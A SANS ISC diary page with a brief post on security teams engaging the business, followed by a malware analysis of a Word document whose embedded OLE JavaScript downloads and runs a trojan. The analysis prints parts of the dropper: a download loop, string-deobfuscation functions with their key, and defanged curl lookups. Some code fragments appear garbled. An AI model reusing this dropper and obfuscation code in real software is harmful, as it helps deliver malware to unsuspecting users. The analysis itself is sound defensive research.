KNOW before NO

Published: 2017-04-28
Last Updated: 2017-04-28 23:48:16 UTC
by Russell Eubanks (Version: 1)
3 comment(s)

A good friend told me that an engaged information security professional is one who leads with the KNOW instead of the NO. This comment struck me and has resonated well for the last several years. It has encouraged me to better understand the desires of the business areas in an attempt to avoid the perception of being the "no police”. 


We are each able to recognize the value in sprinkling in the information security concepts early and often into software development projects. This approach saves each of the stakeholders a great deal of time and frustration. Especially when compared to the very opposite approach that often causes the information security team to learn at the very last minute of a new high profile project that is about to launch without the proper level of information security engagement.


There are certainly projects and initiatives that may very well still warrant a “no” from an information security perspective. Before we go there by default, I respectfully invite us all to KNOW before we NO. I truly believe that each of us can all improve the level of engagement with our respective business areas by considering this approach. In what areas can you KNOW before you NO next week?


Please leave what works in our comments section below.

Russell Eubanks

ISC Handler


3 comment(s)

Another Day, Another Obfuscation Technique

Published: 2017-04-28
Last Updated: 2017-04-28 06:31:50 UTC
by Xavier Mertens (Version: 1)
0 comment(s)
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common "waves" of spam but, sometimes, they are interesting. I'm also collecting pieces of malware via my honeypot and yesterday I detected a Word document with a very low score on VT:
viper Order-complete.docx > info
| Key      | Value                                                                                                                            |
| Name     | Order-complete.docx                                                                                                              |
| Tags     | whiteknight                                                                                                                      |
| Path     | /home/nonroot/.viper/binaries/2/9/d/c/29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3                           |
| Size     | 17034                                                                                                                            |
| Type     | Microsoft Word 2007+                                                                                                             |
| Mime     | application/vnd.openxmlformats-officedocument.wordprocessingml.document                                                          |
| MD5      | 64b342c80a7f9e7ec1c85f1f0059feb3                                                                                                 |
| SHA1     | 5e0b0c0ed682139588f61f37eaf789003590b66a                                                                                         |
| SHA256   | 29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3                                                                 |
| SHA512   | ae709954da0b03a85323e180961a393820a4289a52e1ae752f499a58947863df86cbb9f66a6a7fe5478f9b64278f055f10bc6ba1871df28f882f71d756cbae48 |
| SSdeep   | 384:TyD28Wf7rR+4pMyFvt3nr+Jjgozm3BTmDU:FpzrgeRrqXgMU                                                                             |
| CRC32    | 58486E87                                                                                                                         |
| Parent   |                                                                                                                                  |
| Children | 25545563f98f99ee0274c2698eefbfec91e176d2165f755ca7ef455b3d468016,                                                                |
viper Order-complete.docx > virustotal -v
[+] VirusTotal Report for 64b342c80a7f9e7ec1c85f1f0059feb3:
[*] Detecting engines:
| Antivirus      | Signature                        |
| Cyren          | JS/Agent.XL!Eldorado             |
| F-Prot         | JS/Agent.XL!Eldorado             |
| Fortinet       | JS/Agent.16C27!tr                |
| NANO-Antivirus | Trojan.Script.Heuristic-js.iacgm |
| Qihoo-360      | virus.js.qexvmc.1065             |
[*] 5 out of 59 antivirus detected 64b342c80a7f9e7ec1c85f1f0059feb3 as malicious.

This is usually a good signal for a deeper analyse. We see more and more new types of Microsoft office documents. They are slightly moving from the classic macro that starts automatically:

Sub Auto_Open()
  Msgbox "Welcome to SANS ISC!"
End Sub

to techniques that entice the users to perform an action by stirring up his/her curiosity or by using some social engineering tricks. This is also a good protection against automatic analysis in a sandbox because the document will be opened but the dangerous action not performed.

When you click on the OLE link, you will trigger the execution of a malicious Javascript payload.

viper Order-complete.docx > office -s
[*] Document Structure
 - [Content_Types].xml
 - _rels/.rels
 - word/_rels/document.xml.rels
 - word/document.xml
 - word/media/image1.emf
 - word/embeddings/oleObject1.bin
 - word/theme/theme1.xml
 - word/settings.xml
 - word/webSettings.xml
 - docProps/core.xml
 - word/styles.xml
 - word/fontTable.xml
 - docProps/app.xml

The Javascript is located in word/embeddings/oleObject1.bin. Once extracted and stored in "%APPDATA%\Local\Temp\Order complete.js", it is executed and download a malicious PE file. Let's have a look at some particularities of the code.

First fact: The Javascript is trying to download some content from a website and remains in the main loop until it is successful: (Note: the code has been beautified for easy reading)

var loop = 0;
  try {'----uFuwwu',1), deobfus('----q&FuFuF_;cU:U:quqwFqUtFFq2FuqwFUF;q&q:FFqUFUq2qtF;q:qtUtq;q:qLU:qjqtqqq:UtF_q&F_',1)+'?ff' + loop,
 } catch(e) {
 var data = c.responseText.indexOf('|||');
 if( data == -1 ){
 if(c.Status == 200) break;

It tries to access the following URL:


'x' being incremented by the loop.

When you try to access manually this URL, you get a different content depending on 'x':

$ curl hxxp://
$ curl hxxp://
$ curl hxxp://

Note the '|||' which seems to be a separator.

Second fact: All the strings used in the Javascript code are obfuscated. They are processed by those two functions: (Note: the code has been beautified)

function dabbeeeccdcdfda(dfddaabebca) {
  var dafeeedcfed = dfddaabebca.toString();
  var daddbdbfeed = '';
  for (var ebcebafed = 0; ebcebafed < dafeeedcfed.length; ebcebafed += 2)
    daddbdbfeed += String.fromCharCode(parseInt(dafeeedcfed.substr(ebcebafed, 2), 16));
  return daddbdbfeed;

function deobfus(s,key){
  var fcddcdfcfcfc = "$d.JkT0_gOQ7F:%(*Z,-fCIximY^DLva+WB@4u8&Et!r12URM6q9jKVyAczPn3;HX)pbNhSGsloe5w";
  var buffer = "";
  var l = fcddcdfcfcfc.length-1;
  var size = acbfdddda.length;
  for(var abcafefaddd = 0; abcafefaddd<size ; abcafefaddd++){
    var bdccddcfcfdec = fcddcdfcfcfc.indexOf(acbfdddda.charAt(abcafefaddd));
    var cfbbadafdfabf = bdccddcfcfdec - key;
    if (cfbbadafdfabf<0) {
      cfbbadafdfabf = l - Math.abs(cfbbadafdfabf);
      var caefccffcbfabf = l - 1;
      if (cfbbadafdfabf==caefccffcbfabf) cfbbadafdfabf = cfbbadafdfabf + key;
    buffer = buffer + fcddcdfcfcfc.charAt(cfbbadafdfabf);
  return dabbeeeccdcdfda(buffer);


var foo = deobfus('----q&FuFuF_;cU:U:quqwFqUtFFq2FuqwFUF;q&q:FFqUFUq2qtF;q:qtUtq;q:qLU:qjqtqqq:UtF_q&F_',1)

Will return:


Data returned by the HTTP request use another obfuscation technique. Data are passed to another function with the key being the array of integers (example as seen above: 7,1,2,1,7,7,4,7,6,9,5,5,2). The result is a classic PE file dumped on disk (%HOME%\Desktop\cab4.exe) and executed. The malicious file is a classic trojan.

viper cab4.exe > virustotal -v
[+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954:
[*] Detecting engines:
| Antivirus         | Signature                                  |
| Baidu             | Win32.Trojan.WisdomEyes.16070401.9500.9999 |
| CrowdStrike       | malicious_confidence_100% (D)              |
| Cyren             | W32/Spora.E.gen!Eldorado                   |
| Endgame           | malicious (high confidence)                |
| F-Prot            | W32/Spora.E.gen!Eldorado                   |
| Fortinet          | W32/GenKryptik.ADNX!tr                     |
| Invincea          |                      |
| McAfee            | Ransomware-FMFE!5DC3D99293FE               |
| McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc              |
| Qihoo-360         | HEUR/QVM19.1.C414.Malware.Gen              |
| SentinelOne       | static engine - malicious                  |
| Sophos            | Mal/Elenoocka-E                            |
| Symantec          | ML.Attribute.HighConfidence                |
[*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious.

In this example, we have multiple payloads downloaded with their associated key (no direct PE file), we don't see XOR encryption or Base64 encoding. Nothing suspicious, just plain text!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

0 comment(s)
ISC Stormcast For Friday, April 28th 2017


Diary Archives